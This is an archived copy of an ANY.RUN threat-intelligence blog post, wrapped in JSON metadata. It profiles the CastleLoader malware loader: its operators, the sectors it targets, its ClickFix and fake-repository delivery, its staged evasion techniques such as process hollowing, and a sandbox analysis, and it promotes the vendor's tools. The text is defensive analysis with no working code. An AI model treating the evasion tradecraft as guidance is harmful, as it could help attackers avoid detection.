{ "id": "f5344fa5-8be7-47ea-9cbe-19327a78aeea", "created_at": "2026-04-06T00:07:17.359664Z", "updated_at": "2026-04-10T13:11:43.79495Z", "deleted_at": null, "sha1_hash": "bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27", "title": "CastleLoader: Malware Overview", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1469837, "plain_text": "CastleLoader: Malware Overview\r\nBy ANY.RUN\r\nPublished: 2026-02-02 · Archived: 2026-04-05 21:48:48 UTC\r\n9 min read\r\nFeb 2, 2026\r\nCastleLoader is a modern malware loader designed to quietly establish initial access and deliver follow-up\r\npayloads such as stealers, RATs, and ransomware. It focuses on stealth, flexibility, and rapid payload rotation,\r\nmaking it an effective tool for financially motivated threat actors and a persistent problem for enterprise\r\ndefenders.\r\nCastleLoader: The Quiet Malware That Opens the Door to Bigger Attacks\r\nKey Takeaways\r\n1. CastleLoader is a Sophisticated MaaS Operation; it serves multiple threat actor clusters, delivering\r\ndiverse secondary payloads including information stealers and RATs with a documented 28.7% infection\r\nsuccess rate.\r\n2. Multi-Industry Targeting with Sector-Specific Campaigns: documented campaigns show focused attacks on\r\nlogistics, hospitality, government entities, and software developers through industry-specific social\r\nengineering.\r\n3. ClickFix and Fake Repositories Are Primary Infection Vectors.\r\n4. Advanced Evasion Through Multi-Stage Execution: CastleLoader employs a three-stage architecture\r\n(stager/downloader, loader, core backdoor) with anti-VM detection, in-memory execution, PEB walking,\r\nand process hollowing.\r\n5. ANY.RUN’s Threat Intelligence Lookup helps SOCs quickly understand campaign scope and relationships.\r\nthreatName:”castleloader”\r\nPress enter or click to view image in full size\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 1 of 9\n\nCastleLoader overview in TI Lookup: targeted industries and countries; IOCs; samples\r\nANY.RUN’s Interactive Sandbox allows defenders to safely observe CastleLoader behavior and extract actionable\r\nindicators in real time.\r\nView analysis\r\nPress enter or click to view image in full size\r\nCastleLoader malware analysis\r\nWhat is CastleLoader Malware?\r\nDeveloped and operated by the threat actor tracked as GrayBravo (formerly TAG-150), this loader combines\r\nadvanced evasion techniques with a robust delivery infrastructure that enables multiple threat actors to leverage it\r\nfor their campaigns.\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 2 of 9\n\nThe malware’s architecture consists of multiple components working in concert. At its core, CastleLoader\r\nemploys a three-stage execution chain: a shellcode stager/downloader, a loader component, and a core backdoor\r\nmodule. This modular design allows threat actors to separate the initial infection vector from eventual malware\r\nbehavior, significantly complicating attribution efforts and enabling rapid adaptation to defensive measures.\r\nCastleLoader utilizes sophisticated anti-analysis mechanisms including dead code injection, runtime packing, and\r\nvirtual machine detection capabilities. The malware can escalate privileges to run with administrator rights and\r\ndisplays decoy messages such as fake system warnings to mask its true purpose. Once deployed, it establishes\r\ncommunication with command-and-control (C2) servers to retrieve and execute next-stage payloads, all while\r\nmaintaining a low detection profile through in-memory execution techniques.\r\nRecent variants have evolved to include Python-based loaders that leverage windowless interpreters\r\n(pythonw.exe) to rebuild and launch CastleLoader directly in memory, avoiding disk-based detection. The\r\nmalware employs PEB (Process Environment Block) Walking to resolve required APIs at runtime, further\r\nenhancing its ability to bypass traditional security controls.\r\nWhat makes CastleLoader notable is its operational discipline. Payloads are often updated, infrastructure is\r\nfrequently rotated, and delivery techniques evolve quickly. This reduces the effectiveness of static indicators and\r\nsignature-based defenses, forcing defenders to rely on behavioral analysis and threat intelligence correlation.\r\nTry the full power of interactive analysis.\r\nStart your 14-day trial\r\nHow CastleLoader threatens businesses and organizations\r\nFor organizations, CastleLoader is dangerous precisely because it is not the final threat, but the opening act.\r\nKey business risks include:\r\nInitial access for larger attacks: CastleLoader is often the first step toward ransomware deployment or\r\nlong-term espionage.\r\nCredential theft and lateral movement: Follow-up payloads frequently target browsers, email clients,\r\nVPNs, and internal authentication mechanisms.\r\nData breaches and compliance exposure: Stolen credentials and data can lead to regulatory violations,\r\nfines, and reputational damage.\r\nOperational disruption: Once access is established, attackers can deploy tools that disrupt business\r\noperations at a chosen moment.\r\nHigh dwell time: Because loaders aim to stay unnoticed, attackers may remain inside networks for weeks\r\nbefore triggering visible damage.\r\nIn short, CastleLoader turns a single user mistake into a multi-stage business incident.\r\nVictimology: vulnerable industries and sectors\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 3 of 9\n\nCastleLoader demonstrates broad targeting capabilities with specific threat clusters focusing on particular\r\nindustries:\r\nLogistics and Transportation: The most extensively documented campaign (tracked as TAG-160)\r\nspecifically targets the logistics sector through sophisticated phishing operations. Threat actors impersonate\r\nlegitimate logistics firms and exploit freight-matching platforms like DAT Freight \u0026 Analytics and\r\nLoadlink Technologies.\r\nGovernment Entities: The sensitive nature of governmental data and the potential for espionage make\r\nthese entities particularly attractive targets for threat actors.\r\nHospitality Industry: Campaign clusters have leveraged Booking.com-themed phishing attacks,\r\nindicating focused targeting of hospitality sector organizations and their customers. These campaigns\r\nexploit the industry’s reliance on online booking systems and customer communications.\r\nTechnology and Software Development through fake GitHub repositories mimicking legitimate\r\ndevelopment tools like SQL Server Management Studio (SSMS), RVTools, and Zabbix.\r\nHealthcare facilities have been affected by secondary payloads delivered via CastleLoader, particularly\r\nransomware variants that cause operational disruptions.\r\nFinancial Services: Any organization handling financial transactions, payment processing, or banking\r\noperations faces elevated risk due to the information-stealing capabilities of CastleLoader’s secondary\r\npayloads.\r\nSmall and Medium Enterprises (SMEs): Companies with limited security resources are particularly\r\nvulnerable to CastleLoader’s social engineering tactics, as they may lack robust security awareness training\r\nand advanced detection capabilities.\r\nThe geographical targeting shows strong focus on North American organizations, particularly in the United States,\r\nthough the infrastructure and MaaS model enable global operations.\r\nHow Can Businesses Proactively Protect Against CastleLoader\r\nANY.RUN’s Threat Intelligence Feeds deliver real-time, actionable IOCs (domains, URLs, IPs) derived from\r\nsandbox detonations and global submissions. For CastleLoader, feeds supply emerging C2s, loader variants, and\r\nlinked payloads (e.g., CastleRAT), enabling automated blocking in firewalls, EDR, SIEMs. This helps\r\norganizations stay ahead of evolving MaaS campaigns, minimize dwell time, and prevent chain infections —\r\ncritical for high-velocity threats like loaders.\r\nBusiness Impact:\r\nReduced Mean Time to Detect (MTTD): Automated indicator ingestion identifies CastleLoader activity\r\nwithin minutes rather than hours or days\r\nPrevention of Initial Compromise: Blocking C2 infrastructure and malicious domains prevents\r\nCastleLoader from establishing footholds\r\nOperational Continuity: Early detection and automated blocking minimize disruption to business\r\noperations\r\nImproved Security ROI: Leveraging threat intelligence from 15,000+ organizations maximizes detection\r\ncapabilities without corresponding cost increases.\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 4 of 9\n\nPress enter or click to view image in full size\r\nTI Feeds benefits and integration options\r\nInfection Vectors and Propagation Methods\r\nThe primary infection vector utilizes the ClickFix technique, where victims encounter fraudulent web pages\r\nthemed around Cloudflare services, software development libraries, online meeting platforms (like Google Meet),\r\nor browser update notifications.\r\nThese pages display fake error messages, CAPTCHA verification prompts, or security warnings that instruct users\r\nto copy and execute malicious PowerShell commands via the Windows Run dialog (Win+R).\r\nCastleLoader operators also create convincing fake GitHub repositories under the names of legitimate\r\napplications. For example, repositories named “ssms-lib” (impersonating SQL Server Management Studio) and\r\n“zscaler-dir/Zscaler-Client-Connector” have been used to distribute trojanized installers.\r\nThreat actors employ search engine optimization techniques to ensure malicious download pages rank higher than\r\nlegitimate software distributors in search results. Finally, traditional phishing remains part of the infection chain,\r\nparticularly in logistics sector targeting.\r\nPropagation Mechanism\r\nOnce initial infection occurs via PowerShell script execution, CastleLoader uses built-in Windows utilities\r\n(curl.exe, tar.exe) to download and stage payloads in hidden AppData folders. The malware then establishes C2\r\ncommunication to retrieve additional modules and secondary payloads based on the victim’s value and\r\nenvironment. This staged approach allows operators to deploy targeted malware to high-value victims while\r\nmaintaining flexibility in payload selection.\r\nHow CastleLoader functions\r\nCastleLoader operates through a sophisticated multi-stage execution chain:\r\nGet ANY.RUN’s stories in your inbox\r\nJoin Medium for free to get updates from this writer.\r\nRemember me for faster sign in\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 5 of 9\n\nStage 1: Initial Delivery and Execution\r\nThe infection begins with a packed executable, often delivered via Inno Setup installers containing AutoIT scripts.\r\nWhen executed, the malware unpacks itself at runtime, employing dead code injection to hinder static analysis.\r\nRecent variants use Python bytecode executed via pythonw[.]exe to avoid console windows and disk-based\r\ndetection.\r\nStage 2: Shellcode Stager/Downloader\r\nThe initial stage deploys a shellcode stager that performs environment checks to detect virtual machines,\r\nsandboxes, and analysis tools. If running in a legitimate environment, it proceeds to establish initial C2\r\ncommunication. The stager uses process hollowing techniques to inject code into legitimate Windows processes,\r\nmasking malicious activity within trusted executables.\r\nStage 3: Loader Component\r\nThe loader module connects to the C2 server using HTTP/HTTPS connections with hardcoded User-Agent strings\r\n(notably “GoogleBot”) for identification. It downloads encrypted payload packages from the attacker’s\r\ninfrastructure. The loader employs DLL side-loading techniques, placing malicious DLLs alongside legitimate\r\nexecutables to achieve persistence and execution.\r\nStage 4: Core Backdoor (CastleBot)\r\nThe core module establishes robust C2 communication and awaits task instructions. It gathers system information\r\nincluding:\r\nComputer name and username\r\nOperating system version and architecture\r\nInstalled applications and security products\r\nNetwork configuration\r\nActive process list\r\nThis reconnaissance data allows operators to filter victims and determine appropriate secondary payloads.\r\nPayload Deployment\r\nBased on C2 instructions, CastleLoader downloads and executes various malware families:\r\nInformation Stealers: DeerStealer, RedLine, StealC, Rhadamanthys, MonsterV2 — These extract\r\ncredentials from browsers, email clients, FTP clients, cryptocurrency wallets, and VPN software\r\nRemote Access Trojans: NetSupport RAT, SectopRAT, CastleRAT — These provide persistent backdoor\r\naccess for command execution, file manipulation, and lateral movement\r\nAdditional Loaders: Hijack Loader (GhostPulse) — These extend the infection chain, enabling deployment\r\nof even more malware variants.\r\nSandbox Analysis of CastleLoader Sample\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 6 of 9\n\nANY.RUN’s analysts have detonated a CastleLoader sample in the Interactive Sandbox to extract runtime\r\nconfiguration, C2 infrastructure, and high-confidence IOCs.\r\nView analysis\r\nPress enter or click to view image in full size\r\nCastleLoader dissected in the Interactive Sandbox\r\nWhat instantly grabs attention here is a system process chain, at the end of which a request to\r\n94[.]159[.]113[.]32:80 was sent.\r\nBinary analysis shows that the process incorporates Object Pascal (Delphi) and Inno Setup Module (installer).\r\nThe static and dynamic analysis of the components reveals the path to the payload delivery. You can read the\r\ndetailed analysis in ANY.RUN’s Blog.\r\nThe original Inno Setup installer turned out to be a container with a set of auxiliary files, among which the\r\nAutoIt3.exe + freely.a3x combination played a key role. It is possible to extract and partially decompile the\r\nAutoIt script.\r\nStatic analysis showed that the script prepares the environment and launches the next stage, while dynamic\r\nanalysis confirmed that after jsc.exe is started, one of the process hollowing techniques is executed: another\r\nexecutable module is injected into the process’s address space.\r\nAs a result, a fully functional PE file — the main CastleLoader module — was discovered inside the process.\r\nSuch a sophisticated multi-stage execution chain was not implemented merely to complicate analysis, but\r\nspecifically as an attempt to conceal the execution of the main payload from detection mechanisms. Using Inno\r\nSetup as a container, an AutoIt script as an intermediate layer, and process hollowing over jsc.exe, allows\r\nCastleLoader to distribute across several components that appear benign at first glance.\r\nThe execution model reduces the likelihood of detection, as each individual stage appears legitimate, and the final\r\npayload only manifests in memory after the controlled process has been altered. As a result, static signatures,\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 7 of 9\n\nsimple behavioral heuristics, and process monitoring systems become ineffective. A fully functional malicious\r\nmodule exists only at runtime, and only within an already modified process.\r\nGathering Threat Intelligence on CastleLoader Malware\r\nANY.RUN’s Threat Intelligence Lookup provides critical capabilities for detecting, investigating, and responding\r\nto CastleLoader threats:\r\nRapid IOC Validation and Enrichment\r\nWhen security alerts trigger on potential CastleLoader indicators (IPs, domains, file hashes, PowerShell command\r\npatterns), SOC analysts can query TI Lookup to instantly determine if an indicator is associated with known\r\nCastleLoader campaigns. The platform provides contextual information including malware family classification,\r\ncampaign attribution, and related artifacts — turning isolated indicators into actionable intelligence within\r\nseconds.\r\nDeep Behavioral Analysis Access\r\nTI Lookup provides direct links to interactive sandbox sessions where CastleLoader was analyzed. Analysts can\r\nobserve the complete execution chain. Start exploring with the threat name lookup:\r\nthreatName:”castleloader”\r\nPress enter or click to view image in full size\r\nFresh CastleLoader sandbox analyses found via TI Lookup\r\nComprehensive Event Correlation\r\nWith over 40 search parameters including registry keys, process command lines, network connections, file paths,\r\nand TLS fingerprints, analysts can investigate CastleLoader infections across multiple dimensions. For example,\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 8 of 9\n\nsearching for specific registry modifications or PowerShell patterns associated with ClickFix campaigns reveals\r\nall related samples and campaigns in the database.\r\nYARA Rule Development and Testing\r\nTI Lookup’s integrated YARA Search allows security teams to scan ANY.RUN’s threat intelligence database with\r\ncustom detection rules. Teams can develop YARA rules targeting CastleLoader’s unique characteristics (specific\r\nAPI call patterns, mutex names, shellcode signatures) and immediately test them against millions of analyzed\r\nsamples to validate effectiveness and minimize false positives.\r\nThreat Hunting Capabilities\r\nAnalysts can proactively search for CastleLoader indicators that may have bypassed initial detection.\r\nValue for SOCs and MSSPs:\r\nReduced Mean Time to Respond (MTTR);\r\nLower False Positive Rates;\r\nEnhanced Detection Coverage;\r\nImproved Analyst Efficiency;\r\nCost Optimization.\r\nIntegrate ANY.RUN’s threat intelligence solutions in your company.\r\nContact us\r\nConclusion\r\nCastleLoader exemplifies how modern malware prioritizes access over immediate impact. By the time defenders\r\nnotice the loader, the real damage may already be queued for deployment. Combating such threats requires not\r\njust detection, but context, speed, and intelligence-driven response. Threat intelligence turns CastleLoader from a\r\nsilent entry point into a visible, disruptable operation.\r\nTrial TI Lookup to start gathering actionable threat intelligence on the malware that threatens\r\nyour business sector and region: just sign up to ANY.RUN.\r\nSource: https://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nhttps://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8\r\nPage 9 of 9", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://medium.com/@anyrun/castleloader-malware-overview-a44b9db666b8" ], "report_names": [ "castleloader-malware-overview-a44b9db666b8" ], "threat_actors": [ { "id": "d90307b6-14a9-4d0b-9156-89e453d6eb13", "created_at": "2022-10-25T16:07:23.773944Z", "updated_at": "2026-04-10T02:00:04.746188Z", "deleted_at": null, "main_name": "Lead", "aliases": [ "Casper", "TG-3279" ], "source_name": "ETDA:Lead", "tools": [ "Agentemis", "BleDoor", "Cobalt Strike", "CobaltStrike", "RbDoor", "RibDoor", "Winnti", "cobeacon" ], "source_id": "ETDA", "reports": null }, { "id": "8a13b9be-e36d-4d48-9d19-5c93a62f862f", "created_at": "2026-03-08T02:00:03.472285Z", "updated_at": "2026-04-10T02:00:03.982274Z", "deleted_at": null, "main_name": "GrayBravo", "aliases": [ "TAG-150" ], "source_name": "MISPGALAXY:GrayBravo", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434037, "ts_updated_at": 1775826703, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27.pdf", "text": "https://archive.orkl.eu/bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27.txt", "img": "https://archive.orkl.eu/bacc6c5846045ac1eb4e7bc2bf66c1c54fea1b27.jpg" } }